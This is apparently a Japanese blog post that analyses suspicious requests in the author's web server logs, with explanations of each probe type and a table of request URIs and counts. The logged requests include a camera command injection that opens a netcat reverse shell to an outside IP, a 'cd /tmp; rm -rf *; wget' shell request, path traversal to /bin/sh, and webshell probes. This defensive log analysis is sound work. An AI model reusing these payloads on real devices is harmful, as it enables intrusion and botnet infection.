公開している web サーバのログから通常のアクセスではない通信について分析しました。
多かったリクエスト
ルータなどのネットワーク機器の調査
脆弱性が報告されているルーターなどで使われているログイン画面へアクセスする通信
JVNDB-2016-004125 - JVN iPedia - 脆弱性対策情報データベース
login.cgi
.envの調査
/.env
PHPUnitのevalをリモート実行
PHPのユニットテストツールのPHPUnitの脆弱性を利用してのevalを実行しようとする通信
//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/wp-content/themes/seotheme/db.php?u
TOTOLINKの脆弱性
コマンドインジェクションの脆弱性があり、Miraiの攻撃に利用されている脆弱性みたいです。
TOTOLINKの新たな脆弱性がBeastmode Mirai攻撃の標的に
/cgi-bin/downloadFlile.cgi
Netlink GPONルータ 脆弱性
ルータの脆弱性「CVE-2020-10173」を利用するIoTマルウェア | トレンドマイクロ セキュリティブログ
/boaform/admin/formLogin
カメラの脆弱性
オンライン接続できるカメラのリモートコードを実行できる脆弱性を利用しようとしている脆弱性
/set_ftp.cgi?loginuse=&loginpas=&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+74.201.28.113+1245+-e+%2Fbin%2Fsh%29
Wordpressの情報取集
ログイン画面の確認
/wp-login.php
/post/wp-login.php
バックドアの確認
ハッキングされたWordpressのバックドアを利用しようとしている通信
/wp-content/plugins/ioptimization/IOptimize.php?rchk
不審な通信の一覧
| uri | count |
|---|---|
| login.cgi | 535 |
| /ads.txt | 412 |
| //vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 410 |
| /.env | 285 |
| //.env | 262 |
| /sw.js | 215 |
| /cgi-bin/downloadFlile.cgi | 208 |
| /wp-content/themes/seotheme/db.php?u | 195 |
| /boaform/admin/formLogin | 141 |
| /sellers.json | 131 |
| /set_ftp.cgi?loginuse=&loginpas=&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+74.201.28.113+1245+-e+%2Fbin%2Fsh%29 | 128 |
| /ftptest.cgi?loginuse=&loginpas= | 128 |
| /wp-login.php | 118 |
| * | 114 |
| //wp-content/ | 108 |
| /config/getuser?index=0 | 107 |
| /.git/config | 89 |
| mstshash=Domain | 84 |
| /wp-content/plugins/ioptimization/IOptimize.php?rchk | 77 |
| /post/wp-login.php | 66 |
| /index.xml | 63 |
| /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 54 |
| /app-ads.txt | 45 |
| /actuator/gateway/routes | 40 |
| /aab8 | 32 |
| /shell.php | 28 |
| /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f | 28 |
| /actuator/health | 28 |
| /.well-known/security.txt | 27 |
| /aaa9 | 26 |
| /up.php | 25 |
| /ab2g | 24 |
| \xC0/\xC00\xC0+\xC0,\xCC\xA8\xCC\xA9\xC0\x13\xC0\x09\xC0\x14\xC0 | 23 |
| /sitemap.xml | 21 |
| /info.php | 21 |
| mstshash=Administr | 20 |
| /shell?cd+/tmp;rm+-rf+*;wget+ | 20 |
| /client/get_targets | 20 |
| /HNAP1 | 20 |
| google.com:443 | 19 |
| /upload.php | 19 |
| /test.php | 19 |
| /wso.php | 18 |
| /page-data/category/%E2%98%85%E2%98%85%E2%98%85%E2%98%86%E2%98%86/page-data.json | 18 |
| /autodiscover/autodiscover.json?@zdi/Powershell | 18 |
| /ab2h | 18 |
| /xmlrpc.php?rsd | 17 |
| /wp1/wp-includes/wlwmanifest.xml | 17 |
| /wp/wp-includes/wlwmanifest.xml | 17 |
| /wp-includes/wlwmanifest.xml | 17 |
| /wordpress/wp-includes/wlwmanifest.xml | 17 |
| /web/wp-includes/wlwmanifest.xml | 17 |
| /test/wp-includes/wlwmanifest.xml | 17 |
| /site/wp-includes/wlwmanifest.xml | 17 |
| /sdk | 17 |
| /private/api/v1/service/premaster | 17 |
| /page-data/category/%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%86/page-data.json | 17 |
| /cms/wp-includes/wlwmanifest.xml | 17 |
| /blog/wp-includes/wlwmanifest.xml | 17 |
| /1.php | 17 |
| /shop/wp-includes/wlwmanifest.xml | 16 |
| /page-data/category/%E2%98%85%E2%98%85%E2%98%86%E2%98%86%E2%98%86/page-data.json | 16 |
| /olux.php | 16 |
| /index.php | 16 |
| /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh | 16 |
| /_profiler/phpinfo | 16 |
| /2019/wp-includes/wlwmanifest.xml | 16 |
| //_profiler/empty/search/results | 16 |
| /.git/HEAD | 16 |
| /page-data/category/%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85/page-data.json | 15 |
| /manager/html | 15 |
| /indoxploit.php | 15 |
| /x.php | 14 |
| /wp2/wp-includes/wlwmanifest.xml | 14 |
| /website/wp-includes/wlwmanifest.xml | 14 |
| /sito/wp-includes/wlwmanifest.xml | 14 |
| /news/wp-includes/wlwmanifest.xml | 14 |
| /HNAP1/ | 14 |
| /post/20210807//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 13 |
| /page-data/index/page-data.json | 13 |
| /home.php | 13 |
| /home.asp | 13 |
| /default.php | 13 |
| /admin.php | 13 |
| /about | 13 |
| default.asp | 12 |
| /start.shtml | 12 |
| /start.pl | 12 |
| /start.php | 12 |
| /start.jsp | 12 |
| /start.jsa | 12 |
| /start.jhtml | 12 |
| /start.html | 12 |
| /start.cgi | 12 |
| /start.cfm | 12 |
| /start.aspx | 12 |
| /start.asp | 12 |
| /readme.txt | 12 |
| /pools/default/buckets | 12 |
| /pools | 12 |
| /page-data/sq/d/48878111.json | 12 |
| /menu.shtml | 12 |
| /menu.pl | 12 |
| /menu.php | 12 |
| /menu.jsp | 12 |
| /menu.jsa | 12 |
| /menu.jhtml | 12 |
| /menu.html | 12 |
| /menu.cgi | 12 |
| /menu.cfm | 12 |
| /menu.aspx | 12 |
| /menu.asp | 12 |
| /main.shtml | 12 |
| /main.pl | 12 |
| /main.php | 12 |
| /main.jsp | 12 |
| /main.jsa | 12 |
| /main.jhtml | 12 |
| /main.html | 12 |
| /main.cgi | 12 |
| /main.cfm | 12 |
| /main.aspx | 12 |
| /main.asp | 12 |
| /localstart.shtml | 12 |
| /localstart.pl | 12 |
| /localstart.php | 12 |
| /localstart.jsp | 12 |
| /localstart.jsa | 12 |
| /localstart.jhtml | 12 |
| /localstart.html | 12 |
| /localstart.cgi | 12 |
| /localstart.cfm | 12 |
| /localstart.aspx | 12 |
| /localstart.asp | 12 |
| /inicio.shtml | 12 |
| /inicio.pl | 12 |
| /inicio.php | 12 |
| /inicio.jsp | 12 |
| /inicio.jsa | 12 |
| /inicio.jhtml | 12 |
| /inicio.html | 12 |
| /inicio.cgi | 12 |
| /inicio.cfm | 12 |
| /inicio.aspx | 12 |
| /inicio.asp | 12 |
| /indice.shtml | 12 |
| /indice.pl | 12 |
| /indice.php | 12 |
| /indice.jsp | 12 |
| /indice.jsa | 12 |
| /indice.jhtml | 12 |
| /indice.html | 12 |
| /indice.cgi | 12 |
| /indice.cfm | 12 |
| /indice.aspx | 12 |
| /indice.asp | 12 |
| /index.shtml | 12 |
| /index.pl | 12 |
| /index.jsp | 12 |
| /index.jsa | 12 |
| /index.jhtml | 12 |
| /index.cgi | 12 |
| /index.cfm | 12 |
| /index.aspx | 12 |
| /index.asp | 12 |
| /home.shtml | 12 |
| /home.pl | 12 |
| /home.jsp | 12 |
| /home.jsa | 12 |
| /home.jhtml | 12 |
| /home.html | 12 |
| /home.cgi | 12 |
| /home.cfm | 12 |
| /home.aspx | 12 |
| /docs/cplugError.html/ | 12 |
| /default.shtml | 12 |
| /default.pl | 12 |
| /default.jsp | 12 |
| /default.jsa | 12 |
